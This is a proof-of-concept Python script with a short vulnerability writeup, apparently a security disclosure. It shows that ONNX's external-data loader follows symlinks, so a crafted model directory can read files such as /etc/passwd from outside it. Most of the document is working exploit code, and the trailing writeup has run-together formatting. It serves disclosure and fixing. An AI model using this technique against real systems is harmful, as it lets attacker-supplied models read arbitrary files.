#!/usr/bin/env python3
"""
ONNX External Data Symlink Traversal PoC
Finding: load_external_data_for_model() (via c_checker._resolve_external_data_location)
does not reject symlinks. A relative location that is a symlink inside the
model directory can target a file outside the directory and will be read.
Impact: Arbitrary file read outside model_dir when external data files are
obtained from attacker-controlled archives (zip/tar) that create symlinks.
This PoC:
- Creates a model with a tensor using external_data location 'tensor.bin'
- Creates 'tensor.bin' as a symlink to a system file (e.g., /etc/hosts)
- Calls load_external_data_for_model(model, base_dir)
- Confirms that tensor.raw_data contains the content of the outside file
Safe: only reads a benign system file if present.
"""
import os
import sys
import tempfile
import pathlib
# Ensure we import installed onnx, not the local cloned package
_here = os.path.dirname(os.path.abspath(__file__))
if _here in sys.path:
sys.path.remove(_here)
import onnx
from onnx import helper, TensorProto
from onnx.external_data_helper import (
set_external_data,
load_external_data_for_model,
)
def pick_target_file():
candidates = ["/etc/hosts", "/etc/passwd", "/System/Library/CoreServices/SystemVersion.plist"]
for p in candidates:
if os.path.exists(p) and os.path.isfile(p):
return p
raise RuntimeError("No suitable readable system file found for this PoC")
def build_model_with_external(location: str):
# A 1D tensor; data will be filled from external file
tensor = helper.make_tensor(
name="X_ext",
data_type=TensorProto.UINT8,
dims=[0], # dims will be inferred after raw_data is read
vals=[],
)
# add dummy raw_data then set_external_data to mark as external
tensor.raw_data = b"dummy"
set_external_data(tensor, location=location)
# Minimal graph that just feeds the initializer as Constant
const_node = helper.make_node("Constant", inputs=[], outputs=["out"], value=tensor)
graph = helper.make_graph([const_node], "g", inputs=[], outputs=[helper.make_tensor_value_info("out", TensorProto.UINT8, None)])
model = helper.make_model(graph)
return model
def main():
base = tempfile.mkdtemp(prefix="onnx_symlink_poc_")
model_dir = base
link_name = os.path.join(model_dir, "tensor.bin")
target = pick_target_file()
print(f"[*] Using target file: {target}")
# Create symlink in model_dir pointing outside
try:
pathlib.Path(link_name).symlink_to(target)
except OSError as e:
print(f"[!] Failed to create symlink: {e}")
print(" This PoC needs symlink capability.")
return 1
# Build model referencing the relative location 'tensor.bin'
model = build_model_with_external(location="tensor.bin")
# Use in-memory model; explicitly load external data from base_dir
loaded = model
print("[*] Loading external data into in-memory model...")
try:
load_external_data_for_model(loaded, base_dir=model_dir)
except Exception as e:
print(f"[!] load_external_data_for_model raised: {e}")
return 1
# Validate that raw_data came from outside file by checking a prefix
raw = None
# Search initializers
for t in loaded.graph.initializer:
if t.name == "X_ext" and t.HasField("raw_data"):
raw = t.raw_data
break
# Search constant attributes if not found
if raw is None:
for node in loaded.graph.node:
for attr in node.attribute:
if attr.HasField("t") and attr.t.name == "X_ext" and attr.t.HasField("raw_data"):
raw = attr.t.raw_data
break
if raw is not None:
break
if raw is None:
print("[?] Did not find raw_data on tensor; PoC inconclusive")
return 2
with open(target, "rb") as f:
target_prefix = f.read(32)
if raw.startswith(target_prefix):
print("[!!!] VULNERABILITY CONFIRMED: external_data symlink escaped base_dir")
print(f" Symlink {link_name} -> {target}")
return 0
else:
print("[?] Raw data did not match target prefix; environment-specific behavior")
return 3
if __name__ == "__main__":
sys.exit(main())
Summary
onnx/onnx/checker.cc: resolve_external_data_locationused via Pythononnx.external_data_helper.load_external_data_for_model.Root Cause
resolve_external_data_location(base_dir, location, tensor_name)intends to ensure that external data files reside withinbase_dir. It:..data_path = base_dir / relative_pathexists(data_path)andis_regular_file(data_path)std::filesystem::is_regular_file(path)follows symlinks to their targets. A symlink placed insidebase_dirthat points to a file outsidebase_dirwill pass the checks and be returned. The Python loader then opens the path and reads the target file.Code Reference
auto relative_path = file_path.lexically_normal().make_preferred();std::filesystem::exists(data_path)std::filesystem::is_regular_file(data_path)external_data_helper.load_external_data_for_tensor.Proof of Concept (PoC)
onnx_external_data_symlink_traversal_poc.pytensor.bin. In the model directory, createstensor.binas a symlink to/etc/hosts(or similar). Callsload_external_data_for_model(model, base_dir). Confirms thattensor.raw_datacontains content from the target outside the model directory.python3 onnx_external_data_symlink_traversal_poc.py[!!!] VULNERABILITY CONFIRMED: external_data symlink escaped base_dironnx_external_data_symlink_traversal_poc.py
References